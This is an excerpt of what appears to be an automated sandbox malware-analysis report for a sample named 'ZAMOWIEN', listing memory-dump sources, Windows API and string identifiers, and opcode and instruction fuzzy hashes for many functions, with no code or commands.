                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a223e601c550a4fe2c637721de7ef9b1dd0610db90d18ed9ca9efc29a9bf97d8
                                                                            • Instruction ID: 6626f04625ddb108aae027c20314104b3ae9368e960c83e4390c47f7041c6244
                                                                            • Opcode Fuzzy Hash: a223e601c550a4fe2c637721de7ef9b1dd0610db90d18ed9ca9efc29a9bf97d8
                                                                            • Instruction Fuzzy Hash: C44139B8901298EEDB11CFA9C480AAEBBF4FF48344F50856ED459A7251DB319945CF60
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .
                                                                            • API String ID: 0-248832578
                                                                            • Opcode ID: 8ef28737fc77709af5a75bb97469b27ccb10b1ca6b0beb67e1a1cadc2b6033e3
                                                                            • Instruction ID: a8200a83f07fe65dbc4dba25f8a8bccf901a7cf101ada7ecffa4fb6432870397
                                                                            • Opcode Fuzzy Hash: 8ef28737fc77709af5a75bb97469b27ccb10b1ca6b0beb67e1a1cadc2b6033e3
                                                                            • Instruction Fuzzy Hash: E0E19F78D002689FDB14CF99C8907ADB7F1FF44B44F94811AE889AB290DF74AC92DB50
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: d1e00ed60331ff839d9ef7c254e441076fcce264221f5f0c0faa1507a7b53e82
                                                                            • Instruction ID: ab47c5a7a3d3add4d51525aeeed14e3daf21309d017468bbc7a2cca7b3b15f8a
                                                                            • Opcode Fuzzy Hash: d1e00ed60331ff839d9ef7c254e441076fcce264221f5f0c0faa1507a7b53e82
                                                                            • Instruction Fuzzy Hash: 35314476102714AFC311CF18C884A5A7BA6FF85364F108669EC569F2A1DB71EC42CFE0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: 7f4139ea13a8e1adb6096ce94e59328026d4bab4e36ae5615c1b39cb88c297c6
                                                                            • Instruction ID: 6a0aac5f160649c68863f2aa7352e25e90fb22900855cdc523e420b5476da099
                                                                            • Opcode Fuzzy Hash: 7f4139ea13a8e1adb6096ce94e59328026d4bab4e36ae5615c1b39cb88c297c6
                                                                            • Instruction Fuzzy Hash: EF318E39619A06FFE7468B24CE40E89BBA6FF48350F545025EC109BB50DB75E831CB80
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: 5aacc3259133c77347aa4a3095116d285cb9cc3eab21530ed3f057f5442b859d
                                                                            • Instruction ID: 8b70de49c19270df5dc8134d10e56711862ef9cd77684cce089b2937a2218d0f
                                                                            • Opcode Fuzzy Hash: 5aacc3259133c77347aa4a3095116d285cb9cc3eab21530ed3f057f5442b859d
                                                                            • Instruction Fuzzy Hash: 48210679109690FFE7119F18CD84B1ABBA2FF81714F414569E8415F750CBB2E884CF92
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: 5bcee858466f5fac3d68b04226d3ed2443b806feff816595cfe4dd659cee3156
                                                                            • Instruction ID: 9e97d44f45c232a12d69ad41872e49572a6da57174059221d0f0d46c642b0258
                                                                            • Opcode Fuzzy Hash: 5bcee858466f5fac3d68b04226d3ed2443b806feff816595cfe4dd659cee3156
                                                                            • Instruction Fuzzy Hash: 9AF0FA36200740BBE3319B09CC08F8ABBEEEF84B00F08051DA98293090CAA0A949CA60
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                            • Instruction ID: 15400f85b4caa500bb7e891db3819bb2f41f97be38a985784082829307beb7d9
                                                                            • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                            • Instruction Fuzzy Hash: F9614779D05359EBEB118FA9C840BDEBBB4FF84754F204129E914BB294DB759A00CBA0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                            • Instruction ID: e1b133ce3a9bc657271abda2816fb6fcc44130cf0fc963d79ea5018c14d04f5a
                                                                            • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                            • Instruction Fuzzy Hash: 9751D0BA505305BFE7128F19C840F5BB7E8FF94755F400929BAA497290DBB4ED04CB92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: PreferredUILanguages
                                                                            • API String ID: 0-1884656846
                                                                            • Opcode ID: a236459823e1939fb1f54f294ffdc7ec29bac7a7dd496d25e6d982b35a6d5273
                                                                            • Instruction ID: 719bd72124b213f0dc51fd1f17975b7df02e251d3330401a18bb5c4f4dbb9767
                                                                            • Opcode Fuzzy Hash: a236459823e1939fb1f54f294ffdc7ec29bac7a7dd496d25e6d982b35a6d5273
                                                                            • Instruction Fuzzy Hash: CF41FFBE910619ABDB02CA98C860BEEB7F9FF54754F050166E915AB250DE74DE00CBA0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: verifier.dll
                                                                            • API String ID: 0-3265496382
                                                                            • Opcode ID: 8772632d49ab5f4f1a79875d3589bbe2ffbbb74a93dac910cdbbf0477673d7f3
                                                                            • Instruction ID: 9fb768705bd4508040397ed55217752b1f2efa28e68607ec69645fed36643f3a
                                                                            • Opcode Fuzzy Hash: 8772632d49ab5f4f1a79875d3589bbe2ffbbb74a93dac910cdbbf0477673d7f3
                                                                            • Instruction Fuzzy Hash: 5F31B0BDB11301AFE7148F2CD860B2677E5EF49754F90847AE948DF380EA758C828B90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #
                                                                            • API String ID: 0-1885708031
                                                                            • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                            • Instruction ID: 1d25daba069ddf019bff169727e5e1b704825022673a463169f1ad911e968e92
                                                                            • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                            • Instruction Fuzzy Hash: 7B419FBDA0071AAFEB25CF49C990BBEB7B9EF44745F00405AE94597240DB34D981CBA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Actx
                                                                            • API String ID: 0-89312691
                                                                            • Opcode ID: 46dfe2de97ae68c364894741d587f990fc720d18dae8d88cdc18c6b57c1d81d4
                                                                            • Instruction ID: fc8f76ff90bb09e160250546f9728bbd7353ef48f8b2f6bf168f438ec0f79da8
                                                                            • Opcode Fuzzy Hash: 46dfe2de97ae68c364894741d587f990fc720d18dae8d88cdc18c6b57c1d81d4
                                                                            • Instruction Fuzzy Hash: 5A117F7430C706ABF7184929C8507167396FB953E8F30852AE851DFB90DE73E841C381
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrCreateEnclave
                                                                            • API String ID: 0-3262589265
                                                                            • Opcode ID: 0ea16c3e5d3c0bdcc6c7250586f26683cb308d55ff97a199f63b49516c7f3f95
                                                                            • Instruction ID: a86c6548a8029beccbfe85b057878d0ab8092ea285c99f0ffc934e8c31f6a07e
                                                                            • Opcode Fuzzy Hash: 0ea16c3e5d3c0bdcc6c7250586f26683cb308d55ff97a199f63b49516c7f3f95
                                                                            • Instruction Fuzzy Hash: 612132B55183449FC310CF2AC845A5BFBE8BFD5B00F400A1EB9A49B650DBB1D805CBA2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 832afab0d4ff74fdeab34d7190da593c55a4942595d7333a64dc26a7d5a57a3a
                                                                            • Instruction ID: c6b0a2a88ee503e6f1c485e6dca8fac86896f1d0d5c592a4e5d9eb37fa23c6a9
                                                                            • Opcode Fuzzy Hash: 832afab0d4ff74fdeab34d7190da593c55a4942595d7333a64dc26a7d5a57a3a
                                                                            • Instruction Fuzzy Hash: E142A279A0061A9FDB08CF59C890AAEB7B2FF88354F54856DD955AB340DF34EC42CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ffca889a768c97b54056e69e14a839d99f0adf60aa068dabc2beb7ca1942ede
                                                                            • Instruction ID: fbafe686473aea1d6b7d83c74fe4cecb6655ac5c2177182168796d29fa15afce
                                                                            • Opcode Fuzzy Hash: 5ffca889a768c97b54056e69e14a839d99f0adf60aa068dabc2beb7ca1942ede
                                                                            • Instruction Fuzzy Hash: A832C2B9E01219DFDB14CFACD890BAEBBB1FF54754F144029E805AB391EB35A911CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 78a5dd140c8b85becc8d9b2ec9db07e8df4698003d3dbccb85d2dedd8a575fd5
                                                                            • Instruction ID: 48f3b1c05afa44ee22c30622d18c804125c3daa13141988feb3dfb99af6bd932
                                                                            • Opcode Fuzzy Hash: 78a5dd140c8b85becc8d9b2ec9db07e8df4698003d3dbccb85d2dedd8a575fd5
                                                                            • Instruction Fuzzy Hash: F322A27DA002168FDF09CF58C490AAAB7B2BF89744F64856DD85ADF345DB30E941CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5fcbadad747e2f93a4b31c0f637a450b487c7576d79fa80f27669eb6ee0ba0b9
                                                                            • Instruction ID: d5ab65c6b5dfd9af643181bf37081fe2fa4ead2b6c1573a84e8976b80d108123
                                                                            • Opcode Fuzzy Hash: 5fcbadad747e2f93a4b31c0f637a450b487c7576d79fa80f27669eb6ee0ba0b9
                                                                            • Instruction Fuzzy Hash: 76C1C179E04316ABEB18CF59C841B9EB7B6FF54754F248269D824BB380DB71E941CB80
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 285c2830479334518a3c2c6df298e8c54b5a018bea568b64c23f05010e588605
                                                                            • Instruction ID: f6d52838c23220eda434fbf9e61f3137137c445635b30b3c194ef1d68c198d3a
                                                                            • Opcode Fuzzy Hash: 285c2830479334518a3c2c6df298e8c54b5a018bea568b64c23f05010e588605
                                                                            • Instruction Fuzzy Hash: EDC110BDA01229DFEB18CF58C890B6973A1FF64708F15C159EC55AB2A2EF349941CF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3049a740dd7ee7edb3e63b7cef7c9b43723e9254b91c3c9e7a2bf991819a01b8
                                                                            • Instruction ID: 37038a1669d47bd50aa0a638d73a97d50a242e2381349425028f6b77a161c2cf
                                                                            • Opcode Fuzzy Hash: 3049a740dd7ee7edb3e63b7cef7c9b43723e9254b91c3c9e7a2bf991819a01b8
                                                                            • Instruction Fuzzy Hash: 09A18EB9901205AFEB12CF68CC81FAE37B9EF45754F414054FA10AB2A0DBB5EC51CBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                                                            • Instruction ID: 6bc8f15a2f78c1d6e7a7d647f5d9a3c47e63b99185a21318799aa29942f222b1
                                                                            • Opcode Fuzzy Hash: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                                                            • Instruction Fuzzy Hash: FBA16779600605EFD719CF1CC880A9AF7F6FF88344B24856ED55A8B761EB71E941CB80
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 09d2178d4e40f842090f417bce4f80479c382e1fe428ccf32dcb706480f79e19
                                                                            • Instruction ID: af66a30c331afaaadb1c6f131f32354976a23d426809633ac4f0d329125de834
                                                                            • Opcode Fuzzy Hash: 09d2178d4e40f842090f417bce4f80479c382e1fe428ccf32dcb706480f79e19
                                                                            • Instruction Fuzzy Hash: 0BB16FB8A05315EFDB05CF28C480B9977B1BB04358F604559DC25AF3D5DB76D882CBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                            • Instruction ID: a8a6a655be08376bdece111886b10ae687b352e781b1d649e3bb25de4f4c0cb8
                                                                            • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                            • Instruction Fuzzy Hash: 9671927DA2021A9BDB04CEACC4A0BBEB7F5AF64784F55411ADC14AB241EF74D981CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                            • Instruction ID: 65afe5bc0e0d97f616f9383810dc99843aa4f839922181b37f36260fc449d51f
                                                                            • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                            • Instruction Fuzzy Hash: 64815D7AE002198BDF14CE68CD807ADB7B2FF88358F65816AD819A7244DB35A940CBD5
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 34d6bdd0e12b783c5d88e0bbdd876a01b235061b22e98f13d664eed4558938e9
                                                                            • Instruction ID: 46df7d0282bc956fe4e45c023805aa3d054f4fff235bb8b2f4b69a1588bef8b8
                                                                            • Opcode Fuzzy Hash: 34d6bdd0e12b783c5d88e0bbdd876a01b235061b22e98f13d664eed4558938e9
                                                                            • Instruction Fuzzy Hash: 0B61E2BCB012199BEF048A69C890BBE77BAAF84354F54411DE825A73C4DF74E942CF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
